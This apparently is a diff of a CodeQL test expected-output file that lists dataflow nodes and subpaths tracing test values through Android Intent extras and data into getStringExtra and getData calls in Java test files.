TestStartBroadcastReceiverToIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:23:37:23:67 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:23:46:23:67 | source(...) : Object | semmle.label | source(...) : Object | | TestStartBroadcastReceiverToIntent.java:24:37:24:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:24:37:24:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:24:37:24:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:28:13:28:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:28:13:28:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:28:13:28:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:28:37:28:69 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:28:46:28:69 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartBroadcastReceiverToIntent.java:29:54:29:59 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:29:54:29:59 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:29:54:29:59 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:33:13:33:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:33:13:33:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:33:13:33:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:33:37:33:67 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:33:46:33:67 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartBroadcastReceiverToIntent.java:34:38:34:43 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:34:38:34:43 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:34:38:34:43 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:38:13:38:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:38:13:38:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:38:13:38:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:38:37:38:75 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:38:46:38:75 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartBroadcastReceiverToIntent.java:39:44:39:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:39:44:39:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:39:44:39:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:43:13:43:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:43:13:43:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:43:13:43:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:43:37:43:66 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:43:46:43:66 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartBroadcastReceiverToIntent.java:44:37:44:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:44:37:44:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:44:37:44:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:48:13:48:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:48:13:48:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:48:13:48:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:48:37:48:74 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:48:46:48:74 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartBroadcastReceiverToIntent.java:49:43:49:48 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:49:43:49:48 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:49:43:49:48 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:53:13:53:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:53:13:53:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:53:13:53:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:53:37:53:74 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:53:46:53:74 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartBroadcastReceiverToIntent.java:54:44:54:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:54:44:54:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:54:44:54:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:58:13:58:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:58:13:58:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:58:13:58:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:58:37:58:82 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:58:46:58:82 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartBroadcastReceiverToIntent.java:59:50:59:55 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:59:50:59:55 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:59:50:59:55 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:65:13:65:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:65:13:65:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:65:13:65:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:65:37:65:60 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:65:46:65:60 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartBroadcastReceiverToIntent.java:66:31:66:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:66:31:66:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:66:31:66:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:81:48:81:60 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:81:48:81:60 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:81:48:81:60 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:82:18:82:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:82:18:82:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:82:18:82:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:82:18:82:46 | getStringExtra(...) | semmle.label | getStringExtra(...) 
| | TestStartServiceToIntent.java:19:13:19:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:19:13:19:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:19:13:19:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:19:37:19:59 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:19:46:19:59 | source(...) : Object | semmle.label | source(...) : Object | | TestStartServiceToIntent.java:20:29:20:34 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:20:29:20:34 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:20:29:20:34 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:24:13:24:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:24:13:24:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:24:13:24:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent 
[android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:24:37:24:67 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:24:46:24:67 | source(...) : Object | semmle.label | source(...) : Object | | TestStartServiceToIntent.java:25:35:25:40 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:25:35:25:40 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:25:35:25:40 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:29:37:29:68 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:29:46:29:68 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartServiceToIntent.java:30:37:30:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:30:37:30:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:30:37:30:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:34:13:34:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:34:13:34:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:34:13:34:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:34:37:34:60 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:34:46:34:60 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartServiceToIntent.java:35:30:35:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:35:30:35:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:35:30:35:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:39:13:39:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:39:13:39:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:39:13:39:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:39:37:39:71 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:39:46:39:71 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartServiceToIntent.java:40:40:40:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:40:40:40:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:40:40:40:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:46:13:46:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:46:13:46:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:46:13:46:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:46:37:46:60 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:46:46:46:60 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartServiceToIntent.java:47:30:47:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:47:30:47:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:47:30:47:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:62:29:62:41 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:62:29:62:41 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:62:29:62:41 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:63:18:63:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:63:18:63:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:63:18:63:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:63:18:63:46 | getStringExtra(...) | semmle.label | getStringExtra(...) 
| | TestStartServiceToIntent.java:67:35:67:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:67:35:67:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:67:35:67:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:68:18:68:46 | getStringExtra(...) | semmle.label | getStringExtra(...) 
| | TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:74:18:74:46 | getStringExtra(...) | semmle.label | getStringExtra(...) 
| | TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:80:18:80:46 | getStringExtra(...) | semmle.label | getStringExtra(...) 
| | TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:86:18:86:46 | getStringExtra(...) | semmle.label | getStringExtra(...) 
| | TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:91:18:91:46 | getStringExtra(...) | semmle.label | getStringExtra(...) | subpaths | Test.java:41:65:41:72 | source(...) : String | Test.java:28:29:28:36 | k : String | Test.java:28:89:28:89 | b : Bundle [] : String | Test.java:41:45:41:73 | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:43:19:43:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:43:9:43:40 | getMapKey(...) | | Test.java:43:36:43:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:43:19:43:39 | getIntent_extras(...) 
: Bundle [] : String | -| Test.java:43:36:43:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:43:19:43:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:50:38:50:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:50:21:50:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:50:38:50:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:50:21:50:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:57:17:57:19 | out : Intent [android.content.Intent.data] : Uri | Test.java:32:14:32:26 | intent : Intent [android.content.Intent.data] : Uri | Test.java:32:38:32:53 | getData(...) : Uri | Test.java:57:9:57:20 | getData(...) | | Test.java:64:17:64:19 | out : Intent [android.content.Intent.data] : Uri | Test.java:32:14:32:26 | intent : Intent [android.content.Intent.data] : Uri | Test.java:32:38:32:53 | getData(...) : Uri | Test.java:64:9:64:20 | getData(...) | | Test.java:85:38:85:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence | Test.java:85:21:85:41 | getIntent_extras(...) : Bundle [] : CharSequence | -| Test.java:85:38:85:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence | Test.java:85:21:85:41 | getIntent_extras(...) 
: Bundle [] : CharSequence | | Test.java:92:38:92:40 | out : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : IntentSender | Test.java:92:21:92:41 | getIntent_extras(...) : Bundle [] : IntentSender | -| Test.java:92:38:92:40 | out : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : IntentSender | Test.java:92:21:92:41 | getIntent_extras(...) : Bundle [] : IntentSender | -| Test.java:99:38:99:40 | out : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Intent | Test.java:99:21:99:41 | getIntent_extras(...) : Bundle [] : Intent | | Test.java:99:38:99:40 | out : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Intent | Test.java:99:21:99:41 | getIntent_extras(...) : Bundle [] : Intent | | Test.java:146:43:146:50 | source(...) : Uri | Test.java:27:28:27:35 | data : Uri | Test.java:27:47:27:71 | new Intent(...) : Intent [android.content.Intent.data] : Uri | Test.java:146:24:146:51 | newWithIntent_data(...) : Intent [android.content.Intent.data] : Uri | | Test.java:153:43:153:50 | source(...) : Uri | Test.java:27:28:27:35 | data : Uri | Test.java:27:47:27:71 | new Intent(...) : Intent [android.content.Intent.data] : Uri | Test.java:153:24:153:51 | newWithIntent_data(...) : Intent [android.content.Intent.data] : Uri | | Test.java:246:19:246:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) 
